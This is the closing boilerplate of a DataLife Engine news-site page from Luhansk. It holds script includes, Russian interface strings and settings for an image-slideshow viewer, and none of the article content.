<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

jQuery(function($){

hs.graphicsDir = '/engine/classes/highslide/graphics/';
hs.wrapperClassName = 'rounded-white';
hs.outlineType = 'rounded-white';
hs.numberOfImagesToPreload = 0;
hs.captionEval = 'this.thumb.alt';
hs.showCredits = false;
hs.align = 'center';
hs.transitions = ['expand', 'crossfade'];

hs.lang = { loadingText : 'Загрузка...', playTitle : 'Просмотр слайдшоу (пробел)', pauseTitle:'Пауза', previousTitle : 'Предыдущее изображение', nextTitle :'Следующее изображение',moveTitle :'Переместить', closeTitle :'Закрыть (Esc)',fullExpandTitle:'Развернуть до полного размера',restoreTitle:'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',focusTitle:'Сфокусировать',loadingTitle:'Нажмите для отмены'
};
hs.slideshowGroup='fullnews'; hs.addSlideshow({slideshowGroup: 'fullnews', interval: 4000, repeat: false, useControls: true, fixedControls: 'fit', overlayOptions: { opacity: .75, position: 'bottom center', hideOnMouseOut: true } });

});
//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
